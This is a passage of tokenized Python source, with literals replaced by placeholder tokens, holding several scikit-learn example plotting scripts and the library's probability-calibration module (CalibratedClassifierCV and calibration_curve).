<NUM_LIT:1> ] , c = y_test , cmap = cm_bright , <EOL> alpha = <NUM_LIT> ) <EOL> ax . set_xlim ( xx . min ( ) , xx . max ( ) ) <EOL> ax . set_ylim ( yy . min ( ) , yy . max ( ) ) <EOL> ax . set_xticks ( ( ) ) <EOL> ax . set_yticks ( ( ) ) <EOL> if ds_cnt == <NUM_LIT:0> : <EOL> ax . set_title ( name ) <EOL> ax . text ( xx . max ( ) - <NUM_LIT> , yy . min ( ) + <NUM_LIT> , ( '<STR_LIT>' % score ) . lstrip ( '<STR_LIT:0>' ) , <EOL> size = <NUM_LIT:15> , horizontalalignment = '<STR_LIT:right>' ) <EOL> i += <NUM_LIT:1> <EOL> plt . tight_layout ( ) <EOL> plt . show ( ) </s>
<s> """<STR_LIT>""" <EOL> print ( __doc__ ) <EOL> import numpy as np <EOL> import matplotlib . pyplot as plt <EOL> from scipy . linalg import toeplitz , cholesky <EOL> from sklearn . covariance import LedoitWolf , OAS <EOL> np . random . seed ( <NUM_LIT:0> ) <EOL> n_features = <NUM_LIT:100> <EOL> r = <NUM_LIT:0.1> <EOL> real_cov = toeplitz ( r ** np . arange ( n_features ) ) <EOL> coloring_matrix = cholesky ( real_cov ) <EOL> n_samples_range = np . arange ( <NUM_LIT:6> , <NUM_LIT> , <NUM_LIT:1> ) <EOL> repeat = <NUM_LIT:100> <EOL> lw_mse = np . zeros ( ( n_samples_range . size , repeat ) ) <EOL> oa_mse = np . zeros ( ( n_samples_range . size , repeat ) ) <EOL> lw_shrinkage = np . zeros ( ( n_samples_range . size , repeat ) ) <EOL> oa_shrinkage = np . zeros ( ( n_samples_range . size , repeat ) ) <EOL> for i , n_samples in enumerate ( n_samples_range ) : <EOL> for j in range ( repeat ) : <EOL> X = np . dot ( <EOL> np . random . normal ( size = ( n_samples , n_features ) ) , coloring_matrix . T ) <EOL> lw = LedoitWolf ( store_precision = False , assume_centered = True ) <EOL> lw . fit ( X ) <EOL> lw_mse [ i , j ] = lw . error_norm ( real_cov , scaling = False ) <EOL> lw_shrinkage [ i , j ] = lw . shrinkage_ <EOL> oa = OAS ( store_precision = False , assume_centered = True ) <EOL> oa . fit ( X ) <EOL> oa_mse [ i , j ] = oa . error_norm ( real_cov , scaling = False ) <EOL> oa_shrinkage [ i , j ] = oa . shrinkage_ <EOL> plt . subplot ( <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:1> ) <EOL> plt . errorbar ( n_samples_range , lw_mse . mean ( <NUM_LIT:1> ) , yerr = lw_mse . std ( <NUM_LIT:1> ) , <EOL> label = '<STR_LIT>' , color = '<STR_LIT>' , lw = <NUM_LIT:2> ) <EOL> plt . errorbar ( n_samples_range , oa_mse . mean ( <NUM_LIT:1> ) , yerr = oa_mse . std ( <NUM_LIT:1> ) , <EOL> label = '<STR_LIT>' , color = '<STR_LIT>' , lw = <NUM_LIT:2> ) <EOL> plt . ylabel ( "<STR_LIT>" ) <EOL> plt . legend ( loc = "<STR_LIT>" ) <EOL> plt . title ( "<STR_LIT>" ) <EOL> plt . xlim ( <NUM_LIT:5> , <NUM_LIT> ) <EOL> plt . subplot ( <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:2> ) <EOL> plt . errorbar ( n_samples_range , lw_shrinkage . mean ( <NUM_LIT:1> ) , yerr = lw_shrinkage . std ( <NUM_LIT:1> ) , <EOL> label = '<STR_LIT>' , color = '<STR_LIT>' , lw = <NUM_LIT:2> ) <EOL> plt . errorbar ( n_samples_range , oa_shrinkage . mean ( <NUM_LIT:1> ) , yerr = oa_shrinkage . std ( <NUM_LIT:1> ) , <EOL> label = '<STR_LIT>' , color = '<STR_LIT>' , lw = <NUM_LIT:2> ) <EOL> plt . xlabel ( "<STR_LIT>" ) <EOL> plt . ylabel ( "<STR_LIT>" ) <EOL> plt . legend ( loc = "<STR_LIT>" ) <EOL> plt . ylim ( plt . ylim ( ) [ <NUM_LIT:0> ] , <NUM_LIT:1.> + ( plt . ylim ( ) [ <NUM_LIT:1> ] - plt . ylim ( ) [ <NUM_LIT:0> ] ) / <NUM_LIT> ) <EOL> plt . xlim ( <NUM_LIT:5> , <NUM_LIT> ) <EOL> plt . show ( ) </s>
<s> """<STR_LIT>""" <EOL> print ( __doc__ ) <EOL> import numpy as np <EOL> import matplotlib . pyplot as plt <EOL> from sklearn . datasets import make_classification <EOL> from sklearn . ensemble import ExtraTreesClassifier <EOL> X , y = make_classification ( n_samples = <NUM_LIT:1000> , <EOL> n_features = <NUM_LIT:10> , <EOL> n_informative = <NUM_LIT:3> , <EOL> n_redundant = <NUM_LIT:0> , <EOL> n_repeated = <NUM_LIT:0> , <EOL> n_classes = <NUM_LIT:2> , <EOL> random_state = <NUM_LIT:0> , <EOL> shuffle = False ) <EOL> forest = ExtraTreesClassifier ( n_estimators = <NUM_LIT> , <EOL> random_state = <NUM_LIT:0> ) <EOL> forest . fit ( X , y ) <EOL> importances = forest . feature_importances_ <EOL> std = np . std ( [ tree . feature_importances_ for tree in forest . estimators_ ] , <EOL> axis = <NUM_LIT:0> ) <EOL> indices = np . argsort ( importances ) [ : : - <NUM_LIT:1> ] <EOL> print ( "<STR_LIT>" ) <EOL> for f in range ( X . shape [ <NUM_LIT:1> ] ) : <EOL> print ( "<STR_LIT>" % ( f + <NUM_LIT:1> , indices [ f ] , importances [ indices [ f ] ] ) ) <EOL> plt . figure ( ) <EOL> plt . title ( "<STR_LIT>" ) <EOL> plt . bar ( range ( X . shape [ <NUM_LIT:1> ] ) , importances [ indices ] , <EOL> color = "<STR_LIT:r>" , yerr = std [ indices ] , align = "<STR_LIT>" ) <EOL> plt . xticks ( range ( X . shape [ <NUM_LIT:1> ] ) , indices ) <EOL> plt . xlim ( [ - <NUM_LIT:1> , X . shape [ <NUM_LIT:1> ] ] ) <EOL> plt . show ( ) </s>
<s> """<STR_LIT>""" <EOL> print ( __doc__ ) <EOL> import numpy as np <EOL> from matplotlib import pyplot as pl <EOL> from matplotlib import cm <EOL> from sklearn . gaussian_process import GaussianProcessClassifier <EOL> from sklearn . gaussian_process . kernels import DotProduct , ConstantKernel as C <EOL> lim = <NUM_LIT:8> <EOL> def g ( x ) : <EOL> """<STR_LIT>""" <EOL> return <NUM_LIT> - x [ : , <NUM_LIT:1> ] - <NUM_LIT> * x [ : , <NUM_LIT:0> ] ** <NUM_LIT> <EOL> X = np . array ( [ [ - <NUM_LIT> , - <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , - <NUM_LIT> ] , <EOL> [ - <NUM_LIT> , - <NUM_LIT> ] , <EOL> [ <NUM_LIT> , - <NUM_LIT> ] , <EOL> [ - <NUM_LIT> , <NUM_LIT> ] , <EOL> [ - <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT> ] ] ) <EOL> y = np . array ( g ( X ) > <NUM_LIT:0> , dtype = int ) <EOL> kernel = C ( <NUM_LIT:0.1> , ( <NUM_LIT> , np . inf ) ) * DotProduct ( sigma_0 = <NUM_LIT:0.1> ) ** <NUM_LIT:2> <EOL> gp = GaussianProcessClassifier ( kernel = kernel ) <EOL> gp . fit ( X , y ) <EOL> print ( "<STR_LIT>" % gp . kernel_ ) <EOL> res = <NUM_LIT:50> <EOL> x1 , x2 = np . meshgrid ( np . linspace ( - lim , lim , res ) , <EOL> np . linspace ( - lim , lim , res ) ) <EOL> xx = np . vstack ( [ x1 . reshape ( x1 . size ) , x2 . reshape ( x2 . size ) ] ) . T <EOL> y_true = g ( xx ) <EOL> y_prob = gp . predict_proba ( xx ) [ : , <NUM_LIT:1> ] <EOL> y_true = y_true . reshape ( ( res , res ) ) <EOL> y_prob = y_prob . reshape ( ( res , res ) ) <EOL> fig = pl . figure ( <NUM_LIT:1> ) <EOL> ax = fig . gca ( ) <EOL> ax . axes . set_aspect ( '<STR_LIT>' ) <EOL> pl . xticks ( [ ] ) <EOL> pl . yticks ( [ ] ) <EOL> ax . set_xticklabels ( [ ] ) <EOL> ax . set_yticklabels ( [ ] ) <EOL> pl . xlabel ( '<STR_LIT>' ) <EOL> pl . ylabel ( '<STR_LIT>' ) <EOL> cax = pl . imshow ( y_prob , cmap = cm . gray_r , alpha = <NUM_LIT> , <EOL> extent = ( - lim , lim , - lim , lim ) ) <EOL> norm = pl . matplotlib . colors . Normalize ( vmin = <NUM_LIT:0.> , vmax = <NUM_LIT> ) <EOL> cb = pl . colorbar ( cax , ticks = [ <NUM_LIT:0.> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:1.> ] , norm = norm ) <EOL> cb . set_label ( '<STR_LIT>' ) <EOL> pl . clim ( <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> pl . plot ( X [ y <= <NUM_LIT:0> , <NUM_LIT:0> ] , X [ y <= <NUM_LIT:0> , <NUM_LIT:1> ] , '<STR_LIT>' , markersize = <NUM_LIT:12> ) <EOL> pl . plot ( X [ y > <NUM_LIT:0> , <NUM_LIT:0> ] , X [ y > <NUM_LIT:0> , <NUM_LIT:1> ] , '<STR_LIT>' , markersize = <NUM_LIT:12> ) <EOL> cs = pl . contour ( x1 , x2 , y_true , [ <NUM_LIT:0.> ] , colors = '<STR_LIT:k>' , linestyles = '<STR_LIT>' ) <EOL> cs = pl . contour ( x1 , x2 , y_prob , [ <NUM_LIT> ] , colors = '<STR_LIT:b>' , <EOL> linestyles = '<STR_LIT>' ) <EOL> pl . clabel ( cs , fontsize = <NUM_LIT:11> ) <EOL> cs = pl . contour ( x1 , x2 , y_prob , [ <NUM_LIT:0.5> ] , colors = '<STR_LIT:k>' , <EOL> linestyles = '<STR_LIT>' ) <EOL> pl . clabel ( cs , fontsize = <NUM_LIT:11> ) <EOL> cs = pl . contour ( x1 , x2 , y_prob , [ <NUM_LIT> ] , colors = '<STR_LIT:r>' , <EOL> linestyles = '<STR_LIT>' ) <EOL> pl . clabel ( cs , fontsize = <NUM_LIT:11> ) <EOL> pl . show ( ) </s>
<s> """<STR_LIT>""" <EOL> from matplotlib import pyplot as plt <EOL> import numpy as np <EOL> from sklearn . linear_model import ( <EOL> LinearRegression , TheilSenRegressor , RANSACRegressor , HuberRegressor ) <EOL> from sklearn . metrics import mean_squared_error <EOL> from sklearn . preprocessing import PolynomialFeatures <EOL> from sklearn . pipeline import make_pipeline <EOL> np . random . seed ( <NUM_LIT> ) <EOL> X = np . random . normal ( size = <NUM_LIT> ) <EOL> y = np . sin ( X ) <EOL> X = X [ : , np . newaxis ] <EOL> X_test = np . random . normal ( size = <NUM_LIT:200> ) <EOL> y_test = np . sin ( X_test ) <EOL> X_test = X_test [ : , np . newaxis ] <EOL> y_errors = y . copy ( ) <EOL> y_errors [ : : <NUM_LIT:3> ] = <NUM_LIT:3> <EOL> X_errors = X . copy ( ) <EOL> X_errors [ : : <NUM_LIT:3> ] = <NUM_LIT:3> <EOL> y_errors_large = y . copy ( ) <EOL> y_errors_large [ : : <NUM_LIT:3> ] = <NUM_LIT:10> <EOL> X_errors_large = X . copy ( ) <EOL> X_errors_large [ : : <NUM_LIT:3> ] = <NUM_LIT:10> <EOL> estimators = [ ( '<STR_LIT>' , LinearRegression ( ) ) , <EOL> ( '<STR_LIT>' , TheilSenRegressor ( random_state = <NUM_LIT> ) ) , <EOL> ( '<STR_LIT>' , RANSACRegressor ( random_state = <NUM_LIT> ) ) , <EOL> ( '<STR_LIT>' , HuberRegressor ( ) ) ] <EOL> colors = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> linestyle = { '<STR_LIT>' : '<STR_LIT:->' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> lw = <NUM_LIT:3> <EOL> x_plot = np . linspace ( X . min ( ) , X . max ( ) ) <EOL> for title , this_X , this_y in [ <EOL> ( '<STR_LIT>' , X , y ) , <EOL> ( '<STR_LIT>' , X_errors , y ) , <EOL> ( '<STR_LIT>' , X , y_errors ) , <EOL> ( '<STR_LIT>' , X_errors_large , y ) , <EOL> ( '<STR_LIT>' , X , y_errors_large ) ] : <EOL> plt . figure ( figsize = ( <NUM_LIT:5> , <NUM_LIT:4> ) ) <EOL> plt . plot ( this_X [ : , <NUM_LIT:0> ] , this_y , '<STR_LIT>' ) <EOL> for name , estimator in estimators : <EOL> model = make_pipeline ( PolynomialFeatures ( <NUM_LIT:3> ) , estimator ) <EOL> model . fit ( this_X , this_y ) <EOL> mse = mean_squared_error ( model . predict ( X_test ) , y_test ) <EOL> y_plot = model . predict ( x_plot [ : , np . newaxis ] ) <EOL> plt . plot ( x_plot , y_plot , color = colors [ name ] , linestyle = linestyle [ name ] , <EOL> linewidth = lw , label = '<STR_LIT>' % ( name , mse ) ) <EOL> legend_title = '<STR_LIT>' <EOL> legend = plt . legend ( loc = '<STR_LIT>' , frameon = False , title = legend_title , <EOL> prop = dict ( size = '<STR_LIT>' ) ) <EOL> plt . xlim ( - <NUM_LIT:4> , <NUM_LIT> ) <EOL> plt . ylim ( - <NUM_LIT:2> , <NUM_LIT> ) <EOL> plt . title ( title ) <EOL> plt . show ( ) </s>
<s> """<STR_LIT>""" <EOL> print ( __doc__ ) <EOL> import numpy as np <EOL> import matplotlib . pyplot as plt <EOL> from sklearn . pipeline import Pipeline <EOL> from sklearn . preprocessing import PolynomialFeatures <EOL> from sklearn . linear_model import LinearRegression <EOL> from sklearn . model_selection import cross_val_score <EOL> np . random . seed ( <NUM_LIT:0> ) <EOL> n_samples = <NUM_LIT:30> <EOL> degrees = [ <NUM_LIT:1> , <NUM_LIT:4> , <NUM_LIT:15> ] <EOL> true_fun = lambda X : np . cos ( <NUM_LIT> * np . pi * X ) <EOL> X = np . sort ( np . random . rand ( n_samples ) ) <EOL> y = true_fun ( X ) + np . random . randn ( n_samples ) * <NUM_LIT:0.1> <EOL> plt . figure ( figsize = ( <NUM_LIT> , <NUM_LIT:5> ) ) <EOL> for i in range ( len ( degrees ) ) : <EOL> ax = plt . subplot ( <NUM_LIT:1> , len ( degrees ) , i + <NUM_LIT:1> ) <EOL> plt . setp ( ax , xticks = ( ) , yticks = ( ) ) <EOL> polynomial_features = PolynomialFeatures ( degree = degrees [ i ] , <EOL> include_bias = False ) <EOL> linear_regression = LinearRegression ( ) <EOL> pipeline = Pipeline ( [ ( "<STR_LIT>" , polynomial_features ) , <EOL> ( "<STR_LIT>" , linear_regression ) ] ) <EOL> pipeline . fit ( X [ : , np . newaxis ] , y ) <EOL> scores = cross_val_score ( pipeline , X [ : , np . newaxis ] , y , <EOL> scoring = "<STR_LIT>" , cv = <NUM_LIT:10> ) <EOL> X_test = np . linspace ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:100> ) <EOL> plt . plot ( X_test , pipeline . predict ( X_test [ : , np . newaxis ] ) , label = "<STR_LIT>" ) <EOL> plt . plot ( X_test , true_fun ( X_test ) , label = "<STR_LIT>" ) <EOL> plt . scatter ( X , y , label = "<STR_LIT>" ) <EOL> plt . xlabel ( "<STR_LIT:x>" ) <EOL> plt . ylabel ( "<STR_LIT:y>" ) <EOL> plt . xlim ( ( <NUM_LIT:0> , <NUM_LIT:1> ) ) <EOL> plt . ylim ( ( - <NUM_LIT:2> , <NUM_LIT:2> ) ) <EOL> plt . legend ( loc = "<STR_LIT>" ) <EOL> plt . title ( "<STR_LIT>" . format ( <EOL> degrees [ i ] , - scores . mean ( ) , scores . std ( ) ) ) <EOL> plt . show ( ) </s>
<s> """<STR_LIT>""" <EOL> print ( __doc__ ) <EOL> import numpy as np <EOL> import matplotlib . pyplot as plt <EOL> from sklearn import datasets <EOL> from sklearn import svm <EOL> from sklearn . semi_supervised import label_propagation <EOL> rng = np . random . RandomState ( <NUM_LIT:0> ) <EOL> iris = datasets . load_iris ( ) <EOL> X = iris . data [ : , : <NUM_LIT:2> ] <EOL> y = iris . target <EOL> h = <NUM_LIT> <EOL> y_30 = np . copy ( y ) <EOL> y_30 [ rng . rand ( len ( y ) ) < <NUM_LIT> ] = - <NUM_LIT:1> <EOL> y_50 = np . copy ( y ) <EOL> y_50 [ rng . rand ( len ( y ) ) < <NUM_LIT:0.5> ] = - <NUM_LIT:1> <EOL> ls30 = ( label_propagation . LabelSpreading ( ) . fit ( X , y_30 ) , <EOL> y_30 ) <EOL> ls50 = ( label_propagation . LabelSpreading ( ) . fit ( X , y_50 ) , <EOL> y_50 ) <EOL> ls100 = ( label_propagation . LabelSpreading ( ) . fit ( X , y ) , y ) <EOL> rbf_svc = ( svm . SVC ( kernel = '<STR_LIT>' ) . fit ( X , y ) , y ) <EOL> x_min , x_max = X [ : , <NUM_LIT:0> ] . min ( ) - <NUM_LIT:1> , X [ : , <NUM_LIT:0> ] . max ( ) + <NUM_LIT:1> <EOL> y_min , y_max = X [ : , <NUM_LIT:1> ] . min ( ) - <NUM_LIT:1> , X [ : , <NUM_LIT:1> ] . max ( ) + <NUM_LIT:1> <EOL> xx , yy = np . meshgrid ( np . arange ( x_min , x_max , h ) , <EOL> np . arange ( y_min , y_max , h ) ) <EOL> titles = [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> color_map = { - <NUM_LIT:1> : ( <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> ) , <NUM_LIT:0> : ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> ) , <NUM_LIT:1> : ( <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> ) , <NUM_LIT:2> : ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0> ) } <EOL> for i , ( clf , y_train ) in enumerate ( ( ls30 , ls50 , ls100 , rbf_svc ) ) : <EOL> plt . subplot ( <NUM_LIT:2> , <NUM_LIT:2> , i + <NUM_LIT:1> ) <EOL> Z = clf . predict ( np . c_ [ xx . ravel ( ) , yy . ravel ( ) ] ) <EOL> Z = Z . reshape ( xx . shape ) <EOL> plt . contourf ( xx , yy , Z , cmap = plt . cm . Paired ) <EOL> plt . axis ( '<STR_LIT>' ) <EOL> colors = [ color_map [ y ] for y in y_train ] <EOL> plt . scatter ( X [ : , <NUM_LIT:0> ] , X [ : , <NUM_LIT:1> ] , c = colors , cmap = plt . cm . Paired ) <EOL> plt . title ( titles [ i ] ) <EOL> plt . text ( <NUM_LIT> , <NUM_LIT:0> , "<STR_LIT>" ) <EOL> plt . show ( ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import division <EOL> import warnings <EOL> from math import log <EOL> import numpy as np <EOL> from scipy . optimize import fmin_bfgs <EOL> from . base import BaseEstimator , ClassifierMixin , RegressorMixin , clone <EOL> from . preprocessing import LabelBinarizer <EOL> from . utils import check_X_y , check_array , indexable , column_or_1d <EOL> from . utils . validation import check_is_fitted <EOL> from . utils . fixes import signature <EOL> from . isotonic import IsotonicRegression <EOL> from . svm import LinearSVC <EOL> from . model_selection import check_cv <EOL> from . metrics . classification import _check_binary_probabilistic_predictions <EOL> class CalibratedClassifierCV ( BaseEstimator , ClassifierMixin ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , base_estimator = None , method = '<STR_LIT>' , cv = <NUM_LIT:3> ) : <EOL> self . base_estimator = base_estimator <EOL> self . method = method <EOL> self . cv = cv <EOL> def fit ( self , X , y , sample_weight = None ) : <EOL> """<STR_LIT>""" <EOL> X , y = check_X_y ( X , y , accept_sparse = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> force_all_finite = False ) <EOL> X , y = indexable ( X , y ) <EOL> lb = LabelBinarizer ( ) . fit ( y ) <EOL> self . classes_ = lb . classes_ <EOL> n_folds = self . cv if isinstance ( self . cv , int ) else self . cv . n_folds if hasattr ( self . cv , "<STR_LIT>" ) else None <EOL> if n_folds and np . any ( [ np . sum ( y == class_ ) < n_folds for class_ in self . classes_ ] ) : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( n_folds , n_folds ) ) <EOL> self . calibrated_classifiers_ = [ ] <EOL> if self . base_estimator is None : <EOL> base_estimator = LinearSVC ( random_state = <NUM_LIT:0> ) <EOL> else : <EOL> base_estimator = self . base_estimator <EOL> if self . cv == "<STR_LIT>" : <EOL> calibrated_classifier = _CalibratedClassifier ( <EOL> base_estimator , method = self . method ) <EOL> if sample_weight is not None : <EOL> calibrated_classifier . fit ( X , y , sample_weight ) <EOL> else : <EOL> calibrated_classifier . fit ( X , y ) <EOL> self . calibrated_classifiers_ . append ( calibrated_classifier ) <EOL> else : <EOL> cv = check_cv ( self . cv , y , classifier = True ) <EOL> fit_parameters = signature ( base_estimator . fit ) . parameters <EOL> estimator_name = type ( base_estimator ) . __name__ <EOL> if ( sample_weight is not None <EOL> and "<STR_LIT>" not in fit_parameters ) : <EOL> warnings . warn ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % estimator_name ) <EOL> base_estimator_sample_weight = None <EOL> else : <EOL> base_estimator_sample_weight = sample_weight <EOL> for train , test in cv . split ( X , y ) : <EOL> this_estimator = clone ( base_estimator ) <EOL> if base_estimator_sample_weight is not None : <EOL> this_estimator . fit ( <EOL> X [ train ] , y [ train ] , <EOL> sample_weight = base_estimator_sample_weight [ train ] ) <EOL> else : <EOL> this_estimator . fit ( X [ train ] , y [ train ] ) <EOL> calibrated_classifier = _CalibratedClassifier ( <EOL> this_estimator , method = self . method ) <EOL> if sample_weight is not None : <EOL> calibrated_classifier . fit ( X [ test ] , y [ test ] , <EOL> sample_weight [ test ] ) <EOL> else : <EOL> calibrated_classifier . fit ( X [ test ] , y [ test ] ) <EOL> self . calibrated_classifiers_ . append ( calibrated_classifier ) <EOL> return self <EOL> def predict_proba ( self , X ) : <EOL> """<STR_LIT>""" <EOL> check_is_fitted ( self , [ "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> X = check_array ( X , accept_sparse = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> force_all_finite = False ) <EOL> mean_proba = np . zeros ( ( X . shape [ <NUM_LIT:0> ] , len ( self . classes_ ) ) ) <EOL> for calibrated_classifier in self . calibrated_classifiers_ : <EOL> proba = calibrated_classifier . predict_proba ( X ) <EOL> mean_proba += proba <EOL> mean_proba /= len ( self . calibrated_classifiers_ ) <EOL> return mean_proba <EOL> def predict ( self , X ) : <EOL> """<STR_LIT>""" <EOL> check_is_fitted ( self , [ "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> return self . classes_ [ np . argmax ( self . predict_proba ( X ) , axis = <NUM_LIT:1> ) ] <EOL> class _CalibratedClassifier ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , base_estimator , method = '<STR_LIT>' ) : <EOL> self . base_estimator = base_estimator <EOL> self . method = method <EOL> def _preproc ( self , X ) : <EOL> n_classes = len ( self . classes_ ) <EOL> if hasattr ( self . base_estimator , "<STR_LIT>" ) : <EOL> df = self . base_estimator . decision_function ( X ) <EOL> if df . ndim == <NUM_LIT:1> : <EOL> df = df [ : , np . newaxis ] <EOL> elif hasattr ( self . base_estimator , "<STR_LIT>" ) : <EOL> df = self . base_estimator . predict_proba ( X ) <EOL> if n_classes == <NUM_LIT:2> : <EOL> df = df [ : , <NUM_LIT:1> : ] <EOL> else : <EOL> raise RuntimeError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> idx_pos_class = np . arange ( df . shape [ <NUM_LIT:1> ] ) <EOL> return df , idx_pos_class <EOL> def fit ( self , X , y , sample_weight = None ) : <EOL> """<STR_LIT>""" <EOL> lb = LabelBinarizer ( ) <EOL> Y = lb . fit_transform ( y ) <EOL> self . classes_ = lb . classes_ <EOL> df , idx_pos_class = self . _preproc ( X ) <EOL> self . calibrators_ = [ ] <EOL> for k , this_df in zip ( idx_pos_class , df . T ) : <EOL> if self . method == '<STR_LIT>' : <EOL> calibrator = IsotonicRegression ( out_of_bounds = '<STR_LIT>' ) <EOL> elif self . method == '<STR_LIT>' : <EOL> calibrator = _SigmoidCalibration ( ) <EOL> else : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' % self . method ) <EOL> calibrator . fit ( this_df , Y [ : , k ] , sample_weight ) <EOL> self . calibrators_ . append ( calibrator ) <EOL> return self <EOL> def predict_proba ( self , X ) : <EOL> """<STR_LIT>""" <EOL> n_classes = len ( self . classes_ ) <EOL> proba = np . zeros ( ( X . shape [ <NUM_LIT:0> ] , n_classes ) ) <EOL> df , idx_pos_class = self . _preproc ( X ) <EOL> for k , this_df , calibrator in zip ( idx_pos_class , df . T , self . calibrators_ ) : <EOL> if n_classes == <NUM_LIT:2> : <EOL> k += <NUM_LIT:1> <EOL> proba [ : , k ] = calibrator . predict ( this_df ) <EOL> if n_classes == <NUM_LIT:2> : <EOL> proba [ : , <NUM_LIT:0> ] = <NUM_LIT:1.> - proba [ : , <NUM_LIT:1> ] <EOL> else : <EOL> proba /= np . sum ( proba , axis = <NUM_LIT:1> ) [ : , np . newaxis ] <EOL> proba [ np . isnan ( proba ) ] = <NUM_LIT:1.> / n_classes <EOL> proba [ ( <NUM_LIT:1.0> < proba ) & ( proba <= <NUM_LIT:1.0> + <NUM_LIT> ) ] = <NUM_LIT:1.0> <EOL> return proba <EOL> def _sigmoid_calibration ( df , y , sample_weight = None ) : <EOL> """<STR_LIT>""" <EOL> df = column_or_1d ( df ) <EOL> y = column_or_1d ( y ) <EOL> F = df <EOL> tiny = np . finfo ( np . float ) . tiny <EOL> prior0 = float ( np . sum ( y <= <NUM_LIT:0> ) ) <EOL> prior1 = y . shape [ <NUM_LIT:0> ] - prior0 <EOL> T = np . zeros ( y . shape ) <EOL> T [ y > <NUM_LIT:0> ] = ( prior1 + <NUM_LIT:1.> ) / ( prior1 + <NUM_LIT> ) <EOL> T [ y <= <NUM_LIT:0> ] = <NUM_LIT:1.> / ( prior0 + <NUM_LIT> ) <EOL> T1 = <NUM_LIT:1.> - T <EOL> def objective ( AB ) : <EOL> E = np . exp ( AB [ <NUM_LIT:0> ] * F + AB [ <NUM_LIT:1> ] ) <EOL> P = <NUM_LIT:1.> / ( <NUM_LIT:1.> + E ) <EOL> l = - ( T * np . log ( P + tiny ) + T1 * np . log ( <NUM_LIT:1.> - P + tiny ) ) <EOL> if sample_weight is not None : <EOL> return ( sample_weight * l ) . sum ( ) <EOL> else : <EOL> return l . sum ( ) <EOL> def grad ( AB ) : <EOL> E = np . exp ( AB [ <NUM_LIT:0> ] * F + AB [ <NUM_LIT:1> ] ) <EOL> P = <NUM_LIT:1.> / ( <NUM_LIT:1.> + E ) <EOL> TEP_minus_T1P = P * ( T * E - T1 ) <EOL> if sample_weight is not None : <EOL> TEP_minus_T1P *= sample_weight <EOL> dA = np . dot ( TEP_minus_T1P , F ) <EOL> dB = np . sum ( TEP_minus_T1P ) <EOL> return np . array ( [ dA , dB ] ) <EOL> AB0 = np . array ( [ <NUM_LIT:0.> , log ( ( prior0 + <NUM_LIT:1.> ) / ( prior1 + <NUM_LIT:1.> ) ) ] ) <EOL> AB_ = fmin_bfgs ( objective , AB0 , fprime = grad , disp = False ) <EOL> return AB_ [ <NUM_LIT:0> ] , AB_ [ <NUM_LIT:1> ] <EOL> class _SigmoidCalibration ( BaseEstimator , RegressorMixin ) : <EOL> """<STR_LIT>""" <EOL> def fit ( self , X , y , sample_weight = None ) : <EOL> """<STR_LIT>""" <EOL> X = column_or_1d ( X ) <EOL> y = column_or_1d ( y ) <EOL> X , y = indexable ( X , y ) <EOL> self . a_ , self . b_ = _sigmoid_calibration ( X , y , sample_weight ) <EOL> return self <EOL> def predict ( self , T ) : <EOL> """<STR_LIT>""" <EOL> T = column_or_1d ( T ) <EOL> return <NUM_LIT:1.> / ( <NUM_LIT:1.> + np . exp ( self . a_ * T + self . b_ ) ) <EOL> def calibration_curve ( y_true , y_prob , normalize = False , n_bins = <NUM_LIT:5> ) : <EOL> """<STR_LIT>""" <EOL> y_true = column_or_1d ( y_true ) <EOL> y_prob = column_or_1d ( y_prob ) <EOL> if normalize : <EOL> y_prob = ( y_prob - y_prob . min ( ) ) / ( y_prob . max ( ) - y_prob . min ( ) ) <EOL> elif y_prob . min ( ) < <NUM_LIT:0> or y_prob . max ( ) > <NUM_LIT:1> : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> y_true = _check_binary_probabilistic_predictions ( y_true , y_prob ) <EOL> bins = np . linspace ( <NUM_LIT:0.> , <NUM_LIT:1.> + <NUM_LIT> , n_bins + <NUM_LIT:1> ) <EOL> binids = np . digitize ( y_prob , bins ) - <NUM_LIT:1> <EOL> bin_sums = np . bincount ( binids , weights = y_prob , minlength = len ( bins ) ) <EOL> bin_true = np . bincount ( binids , weights = y_true , minlength = len ( bins ) ) <EOL> bin_total = np . bincount ( binids , minlength = len ( bins ) ) <EOL> nonzero = bin_total != <NUM_LIT:0> <EOL> prob_true = ( bin_true [ nonzero ] / bin_total [ nonzero ] ) <EOL> prob_pred = ( bin_sums [ nonzero ] / bin_total [ nonzero ] ) <EOL> return prob_true , prob_pred </s>
